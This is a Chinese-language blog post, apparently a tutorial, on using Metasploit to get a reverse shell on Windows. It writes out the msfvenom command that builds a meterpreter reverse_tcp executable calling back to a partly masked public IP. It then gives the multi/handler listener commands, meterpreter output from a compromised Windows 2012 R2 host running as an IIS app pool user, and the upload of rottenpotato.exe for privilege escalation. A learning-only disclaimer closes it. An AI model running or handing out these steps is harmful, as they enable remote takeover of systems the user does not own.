利用Metasploit反彈shell
阿新 • • 發佈:2020-10-09
msf製作windows-shell
1 .製作反彈shell-exe檔案
msfvenom -p windows/meterpreter/reverse_tcp LHOST=2x.94.50.153 LPORT=4433 -f exe -o 4433.exe
//LHOST為公網IP
//LPORT為反彈埠
//4433.exe為生成檔案
2.控制端啟動msfconsole,獲取監聽
msfconsle msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set LHOST 2xx.94.50.153 msf5 exploit(multi/handler) > set LPORT 4433 msf5 exploit(multi/handler) > run
3.反彈成功
meterpreter > sysinfo
Computer : WIN-UKKED2CCSHJ
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 3
Meterpreter : x86/windows
meterpreter > getuid
Server username: IIS APPPOOL\padt002
4、上傳檔案
meterpreter > upload /root/RottenPotato/rottenpotato.exe [*] uploading : /root/RottenPotato/rottenpotato.exe -> rottenpotato.exe [*] Uploaded 664.00 KiB of 664.00 KiB (100.0%): /root/RottenPotato/rottenpotato.exe -> rottenpotato.exe [*] uploaded : /root/RottenPotato/rottenpotato.exe -> rottenpotato.exe
msf製作linux-shell
參考連結
csdn-利用Metasploit獲取linux反彈shell的嘗試
csdn-MSF生成windows木馬
宣告
嚴禁讀者利用以上介紹知識點對網站進行非法操作 , 本文僅用於技術交流和學習 , 如果您利用文章中介紹的知識對他人造成損失 , 後果由您自行承擔 , 如果您不能同意該約定 , 請您務必不要閱讀該文章 , 感謝您的配合!